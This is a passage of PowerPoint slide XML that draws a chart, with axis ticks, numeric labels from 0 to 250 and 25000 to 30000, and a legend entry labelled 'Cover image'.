                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215762" y="1731111"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="33403" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8262571" y="1731111"/>
            <a:ext cx="66692" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="33654">
                <a:moveTo>
                  <a:pt x="33403" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215760" y="5665608"/>
            <a:ext cx="0" cy="66692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="33655">
                <a:moveTo>
                  <a:pt x="0" y="33403"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215760" y="1731112"/>
            <a:ext cx="0" cy="66692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="33655">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="33403"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="object 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1171640" y="5818604"/>
            <a:ext cx="129610" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="object 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2602732" y="5665607"/>
            <a:ext cx="0" cy="67951"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="34289">
                <a:moveTo>
                  <a:pt x="0" y="33679"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5688">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="object 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2602458" y="1731112"/>
            <a:ext cx="0" cy="66692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="33655">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="33403"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="object 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2524073" y="5818604"/>
            <a:ext cx="203852" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="-10" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="object 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3994305" y="5665608"/>
            <a:ext cx="0" cy="66692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="33655">
                <a:moveTo>
                  <a:pt x="0" y="33403"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="object 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3994305" y="1731112"/>
            <a:ext cx="0" cy="66692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="33655">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="33403"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="object 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3875904" y="5818605"/>
            <a:ext cx="279353" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="-10" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="object 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5380960" y="5665608"/>
            <a:ext cx="0" cy="66692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="33655">
                <a:moveTo>
                  <a:pt x="0" y="33403"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="object 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5380960" y="1731112"/>
            <a:ext cx="0" cy="66692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="33655">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="33403"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="object 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5266016" y="5818605"/>
            <a:ext cx="279353" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="-10" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>15</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="object 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6772848" y="5665608"/>
            <a:ext cx="0" cy="66692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="33655">
                <a:moveTo>
                  <a:pt x="0" y="33403"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="object 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6772848" y="1731112"/>
            <a:ext cx="0" cy="66692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="33655">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="33403"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="object 38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6655294" y="5818605"/>
            <a:ext cx="279353" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="-10" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>20</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="object 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8159504" y="5665608"/>
            <a:ext cx="0" cy="66692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="33655">
                <a:moveTo>
                  <a:pt x="0" y="33403"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="object 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8159504" y="1731112"/>
            <a:ext cx="0" cy="66692"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="33655">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="33403"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="object 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8045209" y="5818605"/>
            <a:ext cx="279353" cy="167738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1090" spc="-10" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>25</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="20" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="object 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1215760" y="1730992"/>
            <a:ext cx="7113443" cy="4001549"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3589654" h="2019300">
                <a:moveTo>
                  <a:pt x="0" y="59"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="676" y="2018774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3589491" y="2018715"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3589513" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="object 43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="737424" y="1646619"/>
            <a:ext cx="7022844" cy="864660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168">
              <a:lnSpc>
                <a:spcPts val="1258"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1090" spc="-10" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>30000</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="6225203">
              <a:lnSpc>
                <a:spcPts val="1258"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1090" spc="-10" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Cover</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" spc="-149" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1090" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>image</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr sz="991">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="99"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="1288">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="25168">
              <a:spcBef>
                <a:spcPts val="10"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1090" spc="-10" dirty="0">
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>25000</a:t>
            </a:r>
            <a:endParaRPr sz="1090">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="object 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7809948" y="1885050"/>
            <a:ext cx="368696" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="186054">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="185916" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="43020">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="object 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7812125" y="1925757"/>
            <a:ext cx="367438" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="185420">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="184942" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="object 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8178615" y="1840463"/>
            <a:ext cx="0" cy="85568"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="43180">
                <a:moveTo>
                  <a:pt x="0" y="43042"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
